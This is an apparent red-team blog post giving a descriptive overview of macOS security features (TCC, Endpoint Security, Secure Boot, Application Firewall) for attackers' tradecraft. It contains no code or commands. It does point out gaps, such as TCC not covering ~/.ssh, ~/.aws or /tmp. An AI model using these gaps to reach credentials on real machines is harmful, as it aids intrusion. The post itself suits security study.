I recently ventured into macOS security and how to get past it for red team tradecraft. This series of posts contains an overview of components that make up macOS security architecture:

• macOS security fundamentals for red team professionals - Part 1

• macOS security fundamentals for red team professionals - Part 2

• macOS security fundamentals for red team professionals - Part 3

• Transparency Consent and Control (TCC) - It is a framework, provided by Apple, that enables users to control permissions granted to applications. It ensures that applications obtain explicit permission from the user before accessing sensitive data or services such as location, camera, photos, microphone, contacts, calendar etc. It is implemented in the form of an encrypted database, TCC.db, which keeps a record of permissions granted to each application. It stores information about the app, the type of data it requested access to, and the user's decision (allow or deny). Many of these permissions can be controlled from the Privacy & Security Preferences Pane on MacOS. The actual database is maintained at two places, ~/Library/Application Support/com.apple.TCC/TCC.db (user-specific) and /Library/Application Support/com.apple.TCC.db (system-level). These databases are protected by SIP but can be read with full disk access.

  It is important to note that TCC does not protect the user’s home directory and certain directories within it such as .ssh, .aws etc. /tmp directory is also not protected by TCC.

• Endpoint Security - Endpoint Security (ES) is a powerful functionality built into MacOS. To make it simple, you can think of ES as similar to Event Tracing for Windows but with more features. Through ES, Apple offers a C API that provides access to OS telemetry events in the user space instead of the kernel space. One benefit this has over Windows is that on Mac, EDR/AV solutions no longer need to operate in the kernel space. At the crux of ES, is the capability to produce events of two types, notify and auth. Notify events simply inform the user about something that the application did or an operation it performed whereas auth events require users to explicitly approve an operation that the application is about to perform. Events from ES can be analyzed to detect malicious behavior. Apple requires applications that leverage System Extensions (functionality which allows an app to access kernel-level components), to be bundled with ES. This requires the application to hold the com.apple.developer.endpoint-security.client entitlement. To further strengthen the security of applications, this entitlement can only be held by apps which are signed which requires the developer to be enrolled in the Apple Developer program and have a Developer ID. If you want to learn more about Endpoint Security, watch this video from WWDC20. Refer to this article to learn more about ES architecture and also know how ES can be used for hunting malicious activity.

• Secure Boot - This is a technology developed by Apple to enable Mac machines to verify the integrity of the operating system before boot. If the integrity check fails, Secure Boot won’t allow to boot the operating system instead it will offer to reinstall or boot from a different disk. Apple's Secure Boot offers three modes: Full Security, which only allows booting trusted and integrity-checked macOS versions; Medium Security, which permits any previously trusted macOS without integrity checks; and No Security, which removes all restrictions, allowing any operating system to boot. These settings can be accessed and modified via the Startup Security Utility. It is important to note that Secure Boot only functions during the boot process, it plays no role once the operating system has booted up.

• Application Firewall - Application Firewall or ALF is a feature that blocks unauthorized connections to and from a Mac. It works just like Windows firewall. It allows the users to decide which applications and services can or cannot access the internet. It can also alert users on unknown incoming connections and let them decide whether to allow or deny. It comes built-in with MacOS but is disabled by default.

Red Team Notes
- Transparency Consent and Control (TCC) - Allows users to manage app permissions and provide consent for access to sensitive data and services.
- Endpoint Security (ES) - A macOS C API enabling user-space telemetry event access for detecting malicious behavior.
- Secure Boot - Ensures macOS integrity at startup with three security modes, configurable via the Startup Security Utility.
- Application Firewall (ALF) - A built-in macOS feature (disabled by default) for controlling app internet access and blocking unauthorized connections.

Follow my journey of 100 Days of Red Team on WhatsApp or Discord.